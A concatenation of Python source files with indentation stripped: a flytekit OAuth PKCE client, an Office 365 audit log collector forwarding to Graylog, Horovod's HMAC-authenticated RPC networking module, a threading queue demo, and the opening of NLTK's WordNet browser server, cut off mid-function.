A simple wrapper around BaseHTTPServer.BaseHTTPRequestHandler that handles a callback URL that accepts an
authorization token.
"""
def do_GET(self):
url = _urlparse.urlparse(self.path)
if url.path == self.server.redirect_path:
self.send_response(_StatusCodes.OK)
self.end_headers()
self.handle_login(dict(_urlparse.parse_qsl(url.query)))
else:
self.send_response(_StatusCodes.NOT_FOUND)
def handle_login(self, data):
self.server.handle_authorization_code(AuthorizationCode(data["code"], data["state"]))
class OAuthHTTPServer(_BaseHTTPServer.HTTPServer):
"""
A simple wrapper around the BaseHTTPServer.HTTPServer implementation that binds an authorization_client for handling
authorization code callbacks.
"""
def __init__(
self,
server_address,
RequestHandlerClass,
bind_and_activate=True,
redirect_path=None,
queue=None,
):
_BaseHTTPServer.HTTPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate)
self._redirect_path = redirect_path
self._auth_code = None
self._queue = queue
@property
def redirect_path(self):
return self._redirect_path
def handle_authorization_code(self, auth_code):
self._queue.put(auth_code)
class Credentials(object):
def __init__(self, access_token=None):
self._access_token = access_token
@property
def access_token(self):
return self._access_token
class AuthorizationClient(object):
def __init__(self, auth_endpoint=None, token_endpoint=None, client_id=None, redirect_uri=None):
self._auth_endpoint = auth_endpoint
self._token_endpoint = token_endpoint
self._client_id = client_id
self._redirect_uri = redirect_uri
self._code_verifier = _generate_code_verifier()
code_challenge = _create_code_challenge(self._code_verifier)
self._code_challenge = code_challenge
state = _generate_state_parameter()
self._state = state
self._credentials = None
self._refresh_token = None
self._headers = {"content-type": "application/x-www-form-urlencoded"}
self._expired = False
self._params = {
"client_id": client_id, # This must match the Client ID of the OAuth application.
"response_type": "code", # Indicates the authorization code grant
"scope": "openid offline_access", # ensures that the /token endpoint returns an ID and refresh token
# callback location where the user-agent will be directed to.
"redirect_uri": self._redirect_uri,
"state": state,
"code_challenge": code_challenge,
"code_challenge_method": "S256",
}
# Prefer to use already-fetched token values when they've been set globally.
self._refresh_token = _keyring.get_password(_keyring_service_name, _keyring_refresh_token_storage_key)
access_token = _keyring.get_password(_keyring_service_name, _keyring_access_token_storage_key)
if access_token:
self._credentials = Credentials(access_token=access_token)
return
# In the absence of globally-set token values, initiate the token request flow
q = _Queue()
# First prepare the callback server in the background
server = self._create_callback_server(q)
server_process = _Process(target=server.handle_request)
server_process.start()
# Send the call to request the authorization code
self._request_authorization_code()
# Request the access token once the auth code has been received.
auth_code = q.get()
server_process.terminate()
self.request_access_token(auth_code)
def _create_callback_server(self, q):
server_url = _urlparse.urlparse(self._redirect_uri)
server_address = (server_url.hostname, server_url.port)
return OAuthHTTPServer(server_address, OAuthCallbackHandler, redirect_path=server_url.path, queue=q)
def _request_authorization_code(self):
scheme, netloc, path, _, _, _ = _urlparse.urlparse(self._auth_endpoint)
query = _urlencode(self._params)
endpoint = _urlparse.urlunparse((scheme, netloc, path, None, query, None))
_webbrowser.open_new_tab(endpoint)
def _initialize_credentials(self, auth_token_resp):
"""
The auth_token_resp body is of the form:
{
"access_token": "foo",
"refresh_token": "bar",
"id_token": "baz",
"token_type": "Bearer"
}
"""
response_body = auth_token_resp.json()
if "access_token" not in response_body:
raise ValueError('Expected "access_token" in response from oauth server')
if "refresh_token" in response_body:
self._refresh_token = response_body["refresh_token"]
access_token = response_body["access_token"]
refresh_token = response_body["refresh_token"]
_keyring.set_password(_keyring_service_name, _keyring_access_token_storage_key, access_token)
_keyring.set_password(_keyring_service_name, _keyring_refresh_token_storage_key, refresh_token)
self._credentials = Credentials(access_token=access_token)
def request_access_token(self, auth_code):
if self._state != auth_code.state:
raise ValueError("Unexpected state parameter [{}] passed".format(auth_code.state))
self._params.update(
{"code": auth_code.code, "code_verifier": self._code_verifier, "grant_type": "authorization_code"}
)
resp = _requests.post(
url=self._token_endpoint,
data=self._params,
headers=self._headers,
allow_redirects=False,
)
if resp.status_code != _StatusCodes.OK:
# TODO: handle expected (?) error cases:
# https://auth0.com/docs/flows/guides/device-auth/call-api-device-auth#token-responses
raise Exception(
"Failed to request access token with response: [{}] {}".format(resp.status_code, resp.content)
)
self._initialize_credentials(resp)
def refresh_access_token(self):
if self._refresh_token is None:
raise ValueError("no refresh token available with which to refresh authorization credentials")
resp = _requests.post(
url=self._token_endpoint,
data={"grant_type": "refresh_token", "client_id": self._client_id, "refresh_token": self._refresh_token},
headers=self._headers,
allow_redirects=False,
)
if resp.status_code != _StatusCodes.OK:
self._expired = True
# In the absence of a successful response, assume the refresh token is expired. This should indicate
# to the caller that the AuthorizationClient is defunct and a new one needs to be re-initialized.
_keyring.delete_password(_keyring_service_name, _keyring_access_token_storage_key)
_keyring.delete_password(_keyring_service_name, _keyring_refresh_token_storage_key)
return
self._initialize_credentials(resp)
@property
def credentials(self):
"""
:return flytekit.clis.auth.auth.Credentials:
"""
return self._credentials
@property
def expired(self):
"""
:return bool:
"""
return self._expired
|
AuditLogCollector.py | #!/usr/bin/python3
# Standard libs
import os
import json
import logging
import datetime
import argparse
import dateutil.parser
from collections import deque
import threading
# Internal libs
import GraylogInterface
import ApiConnection
class AuditLogCollector(ApiConnection.ApiConnection):
def __init__(self, output_path, content_types, *args, graylog_address=None, graylog_port=None, graylog_output=False,
file_output=False, **kwargs):
"""
Object that can retrieve all available content blobs for a list of content types and then retrieve those
blobs and output them to a file or Graylog input (i.e. send over a socket).
:param output_path: path to output retrieved logs to (None=no file output) (string)
:param content_types: list of content types to retrieve (e.g. 'Audit.Exchange', 'Audit.Sharepoint')
:param graylog_address: IP/Hostname of Graylog server to output audit logs to (str)
:param graylog_port: port of Graylog server to output audit logs to (int)
:param file_output: path of file to output audit logs to (str)
"""
super().__init__(*args, **kwargs)
self.file_output = file_output
self.graylog_output = graylog_output
self.output_path = output_path
self.content_types = content_types
self._known_content = {}
self._graylog_interface = GraylogInterface.GraylogInterface(graylog_address=graylog_address,
graylog_port=graylog_port)
self.blobs_to_collect = deque()
self.monitor_thread = threading.Thread()
self.retrieve_available_content_threads = deque()
self.retrieve_content_threads = deque()
def run_once(self):
"""
Check available content and retrieve it, then exit.
"""
self._clean_known_content()
self.start_monitoring()
self.get_all_available_content()
self.monitor_thread.join()
@property
def done_retrieving_content(self):
return not bool(self.blobs_to_collect)
@property
def done_collecting_available_content(self):
"""
Once a call is made to retrieve content for a particular type, and there is no 'NextPageUri' in the response,
the type is removed from 'self.content_types' to signal that all available content has been retrieved for that
type.
"""
return not bool(self.content_types)
def start_monitoring(self):
self.monitor_thread = threading.Thread(target=self.monitor_blobs_to_collect, daemon=True)
self.monitor_thread.start()
def stop_monitoring(self):
self.monitor_thread.join()
def get_all_available_content(self):
"""
Make a call to retrieve avaialble content blobs for a content type in a thread.
"""
for content_type in self.content_types.copy():
self.retrieve_available_content_threads.append(threading.Thread(
target=self.get_available_content, daemon=True, kwargs={'content_type': content_type}))
self.retrieve_available_content_threads[-1].start()
def get_available_content(self, content_type):
"""
Make a call to retrieve avaialble content blobs for a content type in a thread. If the response contains a
'NextPageUri' there is more content to be retrieved; rerun until all has been retrieved.
"""
logging.log(level=logging.DEBUG, msg='Getting available content for type: "{0}"'.format(content_type))
current_time = datetime.datetime.now(datetime.timezone.utc)
end_time = str(current_time).replace(' ', 'T').rsplit('.', maxsplit=1)[0]
start_time = str(current_time - datetime.timedelta(hours=1)).replace(' ', 'T').rsplit('.', maxsplit=1)[0]
response = self.make_api_request(url='subscriptions/content?contentType={0}&startTime={1}&endTime={2}'.format(
content_type, start_time, end_time))
self.blobs_to_collect += response.json()
while 'NextPageUri' in response.headers.keys() and response.headers['NextPageUri']:
logging.log(level=logging.DEBUG, msg='Getting next page of content for type: "{0}"'.format(content_type))
self.blobs_to_collect += response.json()
response = self.make_api_request(url=response.headers['NextPageUri'], append_url=False)
self.content_types.remove(content_type)
logging.log(level=logging.DEBUG, msg='Got {0} content blobs of type: "{1}"'.format(
len(self.blobs_to_collect), content_type))
def monitor_blobs_to_collect(self):
"""
Wait for the 'retrieve_available_content' function to retrieve content URI's. Once they become available
start retrieving in a background thread.
"""
self._graylog_interface.start()
threads = deque()
while not (self.done_collecting_available_content and self.done_retrieving_content):
if not self.blobs_to_collect:
continue
blob_json = self.blobs_to_collect.popleft()
if blob_json and 'contentUri' in blob_json:
logging.log(level=logging.DEBUG, msg='Retrieving content blob: "{0}"'.format(blob_json))
threads.append(threading.Thread(target=self.retrieve_content, daemon=True,
kwargs={'content_json': blob_json, 'save_as_file': self.file_output, 'send_to_graylog': self.graylog_output}))
threads[-1].start()
self._graylog_interface.stop()
def retrieve_content(self, content_json, send_to_graylog=False, save_as_file=False):
"""
Get an available content blob. If it exists in the list of known content blobs it is skipped to ensure
idempotence.
:param content_json: JSON dict of the content blob as retrieved from the API (dict)
:param send_to_graylog: send the messages to a Graylog input after receiving (Bool)
:param save_as_file: save the messages to a file after receiving (Bool)
:return:
"""
if self.known_content and content_json['contentId'] in self.known_content:
return
try:
result = self.make_api_request(url=content_json['contentUri'], append_url=False).json()
if not result:
return
except:
return
else:
self._add_known_content(content_id=content_json['contentId'],
content_expiration=content_json['contentExpiration'])
if save_as_file:
self.output_results_to_file(results=result, content_id=content_json['contentId'])
if send_to_graylog:
self._graylog_interface.send_messages_to_graylog(*result)
def output_results_to_file(self, results, content_id):
"""
Dump received JSON messages to a file.
:param results: retrieved JSON (dict)
:param content_id: ID of the content blob to avoid duplicates (string)
"""
if not os.path.exists(self.output_path):
os.mkdir(self.output_path)
with open(os.path.join(self.output_path, str(content_id)), 'w') as ofile:
json.dump(obj=results, fp=ofile)
def _add_known_content(self, content_id, content_expiration):
"""
Add a content ID to the known content file to avoid saving messages more than once.
:param content_id: string
:param content_expiration: date string
:return:
"""
with open('known_content', 'a') as ofile:
ofile.write('\n{0},{1}'.format(content_id, content_expiration))
def _clean_known_content(self):
"""
Remove any known content ID's that have expired. Can't download a duplicate if it is not available for
download.
"""
if os.path.exists('known_content'):
known_contents = self.known_content
os.remove('known_content')
for id, expire_date in known_contents.items():
date = dateutil.parser.parse(expire_date)
if datetime.datetime.now(datetime.timezone.utc) < date:
self._add_known_content(content_id=id, content_expiration=expire_date)
@property
def known_content(self):
"""
Parse and return known content file.
:return: {content_id: content_expiration_date} dict
"""
if not os.path.exists('known_content'):
return
if not self._known_content:
with open('known_content', 'r') as ofile:
for line in ofile.readlines():
try:
self._known_content[line.split(',')[0].strip()] = line.split(',')[1]
except:
continue
return self._known_content
if __name__ == "__main__":
description = \
"""
Retrieve audit log contents from Office 365 API and save to file or Graylog.
Example: Retrieve all available content and send it to Graylog (using mock ID's and keys):
"AuditLogCollector.py 123 456 789 --general --exchange --azure_ad --sharepoint --dlp -g -gA 10.10.10.1 -gP 5000
"""
parser = argparse.ArgumentParser(description=description)
parser.add_argument('tenant_id', type=str, help='Tenant ID of Azure AD', action='store')
parser.add_argument('client_key', type=str, help='Client key of Azure application', action='store')
parser.add_argument('secret_key', type=str, help='Secret key generated by Azure application', action='store')
parser.add_argument('--general', action='store_true', help='Retrieve General content', dest='general')
parser.add_argument('--exchange', action='store_true', help='Retrieve Exchange content', dest='exchange')
parser.add_argument('--azure_ad', action='store_true', help='Retrieve Azure AD content', dest='azure_ad')
parser.add_argument('--sharepoint', action='store_true', help='Retrieve SharePoint content', dest='sharepoint')
parser.add_argument('--dlp', action='store_true', help='Retrieve DLP content', dest='dlp')
parser.add_argument('-p', metavar='publisher_id', type=str, help='Publisher GUID to avoid API throttling',
action='store', dest='publisher_id',
default=os.path.join(os.path.dirname(__file__), 'AuditLogCollector.log'))
parser.add_argument('-l', metavar='log_path', type=str, help='Path of log file', action='store', dest='log_path',
default=os.path.join(os.path.dirname(__file__), 'AuditLogCollector.log'))
parser.add_argument('-f', help='Output to file.', action='store_true', dest='file')
parser.add_argument('-fP', metavar='file_output_path', type=str, help='Path of directory of output files',
default=os.path.join(os.path.dirname(__file__), 'output'), action='store',
dest='output_path')
parser.add_argument('-g', help='Output to graylog.', action='store_true', dest='graylog')
parser.add_argument('-gA', metavar='graylog_address', type=str, help='Address of graylog server.', action='store',
dest='graylog_addr')
parser.add_argument('-gP', metavar='graylog_port', type=str, help='Port of graylog server.', action='store',
dest='graylog_port')
parser.add_argument('-d', action='store_true', dest='debug_logging',
help='Enable debug logging (generates large log files and decreases performance).')
args = parser.parse_args()
argsdict = vars(args)
content_types = []
if argsdict['general']:
content_types.append('Audit.General')
if argsdict['exchange']:
content_types.append('Audit.Exchange')
if argsdict['sharepoint']:
content_types.append('Audit.Sharepoint')
if argsdict['azure_ad']:
content_types.append('Audit.AzureActiveDirectory')
if argsdict['dlp']:
content_types.append('DLP.All')
logging.basicConfig(filemode='w', filename=argsdict['log_path'],
level=logging.INFO if not argsdict['debug_logging'] else logging.DEBUG)
logging.log(level=logging.INFO, msg='Starting run @ {0}'.format(datetime.datetime.now()))
collector = AuditLogCollector(output_path=argsdict['output_path'], tenant_id=argsdict['tenant_id'],
secret_key=argsdict['secret_key'], client_key=argsdict['client_key'],
content_types=content_types, graylog_address=argsdict['graylog_addr'],
graylog_port=argsdict['graylog_port'], graylog_output=argsdict['graylog'],
file_output=argsdict['file'], publisher_id=argsdict['publisher_id'])
collector.run_once()
|
network.py | # Copyright 2019 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import random
import socket
import struct
import threading
import cloudpickle
import psutil
from six.moves import queue, socketserver
from horovod.run.common.util import secret
from horovod.run.util.network import find_port
class PingRequest(object):
pass
class NoValidAddressesFound(Exception):
pass
class PingResponse(object):
def __init__(self, service_name, source_address):
self.service_name = service_name
"""Service name that responded to this ping."""
self.source_address = source_address
"""Source IP address that was visible to the service."""
class AckResponse(object):
"""Used for situations when the response does not carry any data."""
pass
class Wire(object):
"""
Used for serialization/deserialization of objects over the wire.
We use HMAC to protect services from unauthorized use. The key used for
the HMAC digest is distributed by Open MPI and Spark.
The objects are serialized using cloudpickle. Serialized objects become
the body of the message.
Structure of the message is as follows:
- HMAC digest of the body (32 bytes)
- length of the body (4 bytes)
- body
"""
def __init__(self, key):
self._key = key
def write(self, obj, wfile):
message = cloudpickle.dumps(obj)
digest = secret.compute_digest(self._key, message)
wfile.write(digest)
# Pack message length into 4-byte integer.
wfile.write(struct.pack('i', len(message)))
wfile.write(message)
wfile.flush()
def read(self, rfile):
digest = rfile.read(secret.DIGEST_LENGTH)
# Unpack message length into 4-byte integer.
message_len = struct.unpack('i', rfile.read(4))[0]
message = rfile.read(message_len)
if not secret.check_digest(self._key, message, digest):
raise Exception('Security error: digest did not match the message.')
return cloudpickle.loads(message)
class BasicService(object):
def __init__(self, service_name, key, nics):
self._service_name = service_name
self._wire = Wire(key)
self._nics = nics
self._server, _ = find_port(
lambda addr: socketserver.ThreadingTCPServer(
addr, self._make_handler()))
self._port = self._server.socket.getsockname()[1]
self._addresses = self._get_local_addresses()
self._thread = threading.Thread(target=self._server.serve_forever)
self._thread.daemon = True
self._thread.start()
def _make_handler(self):
server = self
class _Handler(socketserver.StreamRequestHandler):
def handle(self):
try:
req = server._wire.read(self.rfile)
resp = server._handle(req, self.client_address)
if not resp:
raise Exception('Handler did not return a response.')
server._wire.write(resp, self.wfile)
except EOFError:
# Happens when client is abruptly terminated, don't want to pollute the logs.
pass
return _Handler
def _handle(self, req, client_address):
if isinstance(req, PingRequest):
return PingResponse(self._service_name, client_address[0])
raise NotImplementedError(req)
def _get_local_addresses(self):
result = {}
for intf, intf_addresses in psutil.net_if_addrs().items():
if self._nics and intf not in self._nics:
continue
for addr in intf_addresses:
if addr.family == socket.AF_INET:
if intf not in result:
result[intf] = []
result[intf].append((addr.address, self._port))
if not result and self._nics:
raise NoValidAddressesFound(
'No available network interface found matching user provided interface: {}'.format(self._nics))
return result
def addresses(self):
return self._addresses
def shutdown(self):
self._server.shutdown()
self._server.server_close()
self._thread.join()
def get_port(self):
return self._port
class BasicClient(object):
def __init__(self, service_name, addresses, key, verbose, match_intf=False,
probe_timeout=20, attempts=3):
# Note: because of retry logic, ALL RPC calls are REQUIRED to be idempotent.
self._verbose = verbose
self._service_name = service_name
self._wire = Wire(key)
self._match_intf = match_intf
self._probe_timeout = probe_timeout
self._attempts = attempts
self._addresses = self._probe(addresses)
if not self._addresses:
raise NoValidAddressesFound(
'Horovod was unable to connect to {service_name} on any '
'of the following addresses: {addresses}.\n\n'
'One possible cause of this problem is that '
'horovod currently requires every host to have at '
'least one routable network interface with the same '
'name across all of the hosts. '
'You can run \"ifconfig -a\" '
'on every host and check for the common '
'routable interface. '
'To fix the problem, you can rename interfaces on '
'Linux.'.format(service_name=service_name, addresses=addresses))
def _probe(self, addresses):
result_queue = queue.Queue()
threads = []
for intf, intf_addresses in addresses.items():
for addr in intf_addresses:
thread = threading.Thread(target=self._probe_one,
args=(intf, addr, result_queue))
thread.daemon = True
thread.start()
threads.append(thread)
for t in threads:
t.join()
result = {}
while not result_queue.empty():
intf, addr = result_queue.get()
if intf not in result:
result[intf] = []
result[intf].append(addr)
return result
def _probe_one(self, intf, addr, result_queue):
for iter in range(self._attempts):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(self._probe_timeout)
try:
sock.connect(addr)
rfile = sock.makefile('rb')
wfile = sock.makefile('wb')
try:
self._wire.write(PingRequest(), wfile)
resp = self._wire.read(rfile)
if resp.service_name != self._service_name:
return
if self._match_intf:
# Interface name of destination and source must match
# since `match_intf` is requested.
client_intf_addrs = [x.address
for x in psutil.net_if_addrs().get(intf, [])
if x.family == socket.AF_INET]
if resp.source_address not in client_intf_addrs:
if self._verbose >= 2:
# Need to find the local interface name whose
# address was visible to the target host's server.
resp_intf = ''
for key in psutil.net_if_addrs().keys():
key_intf_addrs = [x.address
for x in psutil.net_if_addrs().get(key, [])]
if resp.source_address in key_intf_addrs:
resp_intf = key
break
print('WARNING: Expected to connect the host '
'{addr} using interface '
'{intf}, but reached it on interface '
'{resp_intf}.'.format(
addr=str(addr[0])+':'+str(addr[1]),
intf=intf,
resp_intf=resp_intf))
return
result_queue.put((intf, addr))
return
finally:
rfile.close()
wfile.close()
except:
pass
finally:
sock.close()
def _send_one(self, addr, req):
for iter in range(self._attempts):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(addr)
rfile = sock.makefile('rb')
wfile = sock.makefile('wb')
try:
self._wire.write(req, wfile)
resp = self._wire.read(rfile)
return resp
finally:
rfile.close()
wfile.close()
except:
if iter == self._attempts - 1:
# Raise exception on the last retry.
raise
finally:
sock.close()
def _send(self, req):
# Since all the addresses were vetted, use the first one.
addr = list(self._addresses.values())[0][0]
return self._send_one(addr, req)
def addresses(self):
return self._addresses
|
queuetest3.py | "same as queuetest2.py, but uses threading, not _threads"
numconsumers = 2 # how many consumers to start
numproducers = 4 # how many producers to start
nummessages = 4 # messages per producer to put
import threading, queue, time, sys
safeprint = threading.Lock() # else prints may overlap
dataQueue = queue.Queue() # shared global, infinite size
def producer(idnum, dataqueue):
for msgnum in range(nummessages):
time.sleep(idnum)
dataqueue.put('[producer id=%d, count=%d]' % (idnum, msgnum))
def consumer(idnum, dataqueue):
while True:
time.sleep(0.1)
try:
data = dataqueue.get(block=False)
except queue.Empty:
pass
else:
with safeprint:
print('consumer', idnum, 'got =>', data)
if __name__ == '__main__':
for i in range(numconsumers):
thread = threading.Thread(target=consumer, args=(i, dataQueue))
thread.daemon = True # else cannot exit!
thread.start()
waitfor = []
for i in range(numproducers):
thread = threading.Thread(target=producer, args=(i, dataQueue))
waitfor.append(thread)
thread.start()
for thread in waitfor: thread.join() # or time.sleep() long enough here
print('Main thread exit.')
|
wordnet_app.py | # Natural Language Toolkit: WordNet Browser Application
#
# Copyright (C) 2001-2018 NLTK Project
# Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
# Paul Bone <pbone@students.csse.unimelb.edu.au>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
A WordNet Browser application which launches the default browser
(if it is not already running) and opens a new tab with a connection
to http://localhost:port/ . It also starts an HTTP server on the
specified port and begins serving browser requests. The default
port is 8000. (For command-line help, run "python wordnet -h")
This application requires that the user's web browser supports
Javascript.
BrowServer is a server for browsing the NLTK Wordnet database It first
launches a browser client to be used for browsing and then starts
serving the requests of that and maybe other clients
Usage::
browserver.py -h
browserver.py [-s] [-p <port>]
Options::
-h or --help
Display this help message.
-l <file> or --log-file <file>
Logs messages to the given file, If this option is not specified
messages are silently dropped.
-p <port> or --port <port>
Run the web server on this TCP port, defaults to 8000.
-s or --server-mode
Do not start a web browser, and do not allow a user to
shotdown the server through the web interface.
"""
# TODO: throughout this package variable names and docstrings need
# modifying to be compliant with NLTK's coding standards. Tests also
# need to be develop to ensure this continues to work in the face of
# changes to other NLTK packages.
from __future__ import print_function
# Allow this program to run inside the NLTK source tree.
from sys import path
import os
import sys
from sys import argv
from collections import defaultdict
import webbrowser
import datetime
import re
import threading
import time
import getopt
import base64
import pickle
import copy
from six.moves.urllib.parse import unquote_plus
from nltk import compat
from nltk.corpus import wordnet as wn
from nltk.corpus.reader.wordnet import Synset, Lemma
if compat.PY3:
from http.server import HTTPServer, BaseHTTPRequestHandler
else:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
# now included in local file
# from util import html_header, html_trailer, \
# get_static_index_page, get_static_page_by_path, \
# page_from_word, page_from_href
firstClient = True
# True if we're not also running a web browser. The value f server_mode
# gets set by demo().
server_mode = None
# If set this is a file object for writting log messages.
logfile = None
class MyServerHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
self.send_head()
def do_GET(self):
global firstClient
sp = self.path[1:]
if unquote_plus(sp) == 'SHUTDOWN THE SERVER':
if server_mode:
page = "Server must be killed with SIGTERM."
type = "text/plain"
else:
print('Server shutting down!')
os._exit(0)
elif sp == '': # First request.
type = 'text/html'
if not server_mode and firstClient:
firstClient = False
page = get_static_index_page(True)
else:
page = get_static_index_page(False)
word = 'green'
elif sp.endswith('.html'): # Trying to fetch a HTML file TODO:
type = 'text/html'
usp = unquote_plus(sp)
if usp == 'NLTK Wordnet Browser Database Info.html':
word = '* Database Info *'
if os.path.isfile(usp):
with open(usp, 'r') as infile:
page = infile.read()
else:
page = (html_header % word) + \
'<p>The database info file:'\
'<p><b>' + usp + '</b>' + \
'<p>was not found. Run this:' + \
'<p><b>python dbinfo_html.py</b>' + \
'<p>to produce it.' + html_trailer
else:
# Handle files here.
word = sp
page = get_static_page_by_path(usp)
elif sp.startswith("search"):
# This doesn't seem to work with MWEs.
type = 'text/html'
parts = (sp.split("?")[1]).split("&")
word = [p.split("=")[1].replace("+", " ")
for p in parts if p.startswith("nextWord")][0]
page, word = page_from_word(word)
elif sp.startswith("lookup_"):
# TODO add a variation of this that takes a non ecoded word or MWE.
type = 'text/html'
sp = sp[len("lookup_"):]
page, word = page_from_href(sp)
elif sp == "start_page":
# if this is the first request we should display help
# information, and possibly set a default word.
type = 'text/html'
page, word = page_from_word("wordnet")
else:
type = 'text/plain'
page = "Could not parse request: '%s'" % sp
# Send result.
self.send_head(type)
self.wfile.write(page.encode('utf8'))
def send_head(self, type=None):
self.send_response(200)
self.send_header('Content-type', type)
self.end_headers()
def log_message(self, format, *args):
global logfile
if logfile:
logfile.write(
"%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format%args))
def get_unique_counter_from_url(sp):
"""
Extract the unique counter from the URL if it has one. Otherwise return
null.
"""
pos = sp.rfind('%23')
if pos != -1:
return int(sp[(pos + 3):])
else:
return None
def wnb(port=8000, runBrowser=True, logfilename=None):
"""
Run NLTK Wordnet Browser Server.
:param port: The port number for the server to listen on, defaults to
8000
:type port: int
:param runBrowser: True to start a web browser and point it at the web
server.
:type runBrowser: bool
"""
# The webbrowser module is unpredictable, typically it blocks if it uses
# a console web browser, and doesn't block if it uses a GUI webbrowser,
# so we need to force it to have a clear correct behaviour.
#
# Normally the server should run for as long as the user wants. they
# should idealy be able to control this from the UI by closing the
# window or tab. Second best would be clicking a button to say
# 'Shutdown' that first shutsdown the server and closes the window or
# tab, or exits the text-mode browser. Both of these are unfreasable.
#
# The next best alternative is to start the server, have it close when
# it receives SIGTERM (default), and run the browser as well. The user
# may have to shutdown both programs.
#
# Since webbrowser may block, and the webserver will block, we must run
# them in separate threads.
#
global server_mode, logfile
server_mode = not runBrowser
# Setup logging.
if logfilename:
try:
logfile = open(logfilename, "a", 1) # 1 means 'line buffering'
except IOError as e:
sys.stderr.write("Couldn't open %s for writing: %s",
logfilename, e)
sys.exit(1)
else:
logfile = None
# Compute URL and start web browser
url = 'http://localhost:' + str(port)
server_ready = None
browser_thread = None
if runBrowser:
server_ready = threading.Event()
browser_thread = startBrowser(url, server_ready)
# Start the server.
server = HTTPServer(('', port), MyServerHandler)
if logfile:
logfile.write(
'NLTK Wordnet browser server running serving: %s\n' % url)
if runBrowser:
server_ready.set()
try:
server.serve_forever()
except KeyboardInterrupt:
pass
if runBrowser:
browser_thread.join()
if logfile:
logfile.close()
def startBrowser(url, server_ready):
def run():
server_ready.wait()
time.sleep(1) # Wait a little bit more, there's still the chance of
# a race condition.
webbrowser.open(url, new = 2, autoraise = 1)
t = threading.Thread(target=run)
t.start()
return t
#####################################################################
# Utilities
#####################################################################
"""
WordNet Browser Utilities.
This provides a backend to both wxbrowse and browserver.py.
"""
################################################################################
#
# Main logic for wordnet browser.
#
# This is wrapped inside a function since wn is only available if the
# WordNet corpus is installed.
def _pos_tuples():
return [
(wn.NOUN,'N','noun'),
(wn.VERB,'V','verb'),
(wn.ADJ,'J','adj'),
(wn.ADV,'R','adv')]
def _pos_match(pos_tuple):
"""
This function returns the complete pos tuple for the partial pos
tuple given to it. It attempts to match it against the first
non-null component of the given pos tuple.
"""
if pos_tuple[0] == 's':
pos_tuple = ('a', pos_tuple[1], pos_tuple[2])
for n,x in enumerate(pos_tuple):
if x is not None:
break
for pt in _pos_tuples():
if pt[n] == pos_tuple[n]: return pt
return None
HYPONYM = 0
HYPERNYM = 1
CLASS_REGIONAL = 2
PART_HOLONYM = 3
PART_MERONYM = 4
ATTRIBUTE = 5
SUBSTANCE_HOLONYM = 6
SUBSTANCE_MERONYM = 7
MEMBER_HOLONYM = 8
MEMBER_MERONYM = 9
VERB_GROUP = 10
INSTANCE_HYPONYM = 12
INSTANCE_HYPERNYM = 13
CAUSE = 14
ALSO_SEE = 15
SIMILAR = 16
ENTAILMENT = 17
ANTONYM = 18
FRAMES = 19
PERTAINYM = 20
CLASS_CATEGORY = 21
CLASS_USAGE = 22
CLASS_REGIONAL = 23
CLASS_USAGE = 24
CLASS_CATEGORY = 11
DERIVATIONALLY_RELATED_FORM = 25
INDIRECT_HYPERNYMS = 26
def lemma_property(word, synset, func):
def flattern(l):
if l == []:
return []
else:
return l[0] + flattern(l[1:])
return flattern([func(l) for l in synset.lemmas if l.name == word])
def rebuild_tree(orig_tree):
node = orig_tree[0]
children = orig_tree[1:]
return (node, [rebuild_tree(t) for t in children])
def get_relations_data(word, synset):
"""
Get synset relations data for a synset. Note that this doesn't
yet support things such as full hyponym vs direct hyponym.
"""
if synset.pos() == wn.NOUN:
return ((HYPONYM, 'Hyponyms',
synset.hyponyms()),
(INSTANCE_HYPONYM , 'Instance hyponyms',
synset.instance_hyponyms()),
(HYPERNYM, 'Direct hypernyms',
synset.hypernyms()),
(INDIRECT_HYPERNYMS, 'Indirect hypernyms',
rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1]),
# hypernyms', 'Sister terms',
(INSTANCE_HYPERNYM , 'Instance hypernyms',
synset.instance_hypernyms()),
# (CLASS_REGIONAL, ['domain term region'], ),
(PART_HOLONYM, 'Part holonyms',
synset.part_holonyms()),
(PART_MERONYM, 'Part meronyms',
synset.part_meronyms()),
(SUBSTANCE_HOLONYM, 'Substance holonyms',
synset.substance_holonyms()),
(SUBSTANCE_MERONYM, 'Substance meronyms',
synset.substance_meronyms()),
(MEMBER_HOLONYM, 'Member holonyms',
synset.member_holonyms()),
(MEMBER_MERONYM, 'Member meronyms',
synset.member_meronyms()),
(ATTRIBUTE, 'Attributes',
synset.attributes()),
(ANTONYM, "Antonyms",
lemma_property(word, synset, lambda l: l.antonyms())),
(DERIVATIONALLY_RELATED_FORM, "Derivationally related form",
lemma_property(word, synset, lambda l: l.derivationally_related_forms())))
elif synset.pos() == wn.VERB:
return ((ANTONYM, 'Antonym',
lemma_property(word, synset, lambda l: l.antonyms())),
(HYPONYM, 'Hyponym',
synset.hyponyms()),
(HYPERNYM, 'Direct hypernyms',
synset.hypernyms()),
(INDIRECT_HYPERNYMS, 'Indirect hypernyms',
rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1]),
(ENTAILMENT, 'Entailments',
synset.entailments()),
(CAUSE, 'Causes',
synset.causes()),
(ALSO_SEE, 'Also see',
synset.also_sees()),
(VERB_GROUP, 'Verb Groups',
synset.verb_groups()),
(DERIVATIONALLY_RELATED_FORM, "Derivationally related form",
lemma_property(word, synset, lambda l: l.derivationally_related_forms())))
elif synset.pos() == wn.ADJ or synset.pos == wn.ADJ_SAT:
return ((ANTONYM, 'Antonym',
lemma_property(word, synset, lambda l: l.antonyms())),
(SIMILAR, 'Similar to',
synset.similar_tos()),
# Participle of verb - not supported by corpus
(PERTAINYM, 'Pertainyms',
lemma_property(word, synset, lambda l: l.pertainyms())),
(ATTRIBUTE, 'Attributes',
synset.attributes()),
(ALSO_SEE, 'Also see',
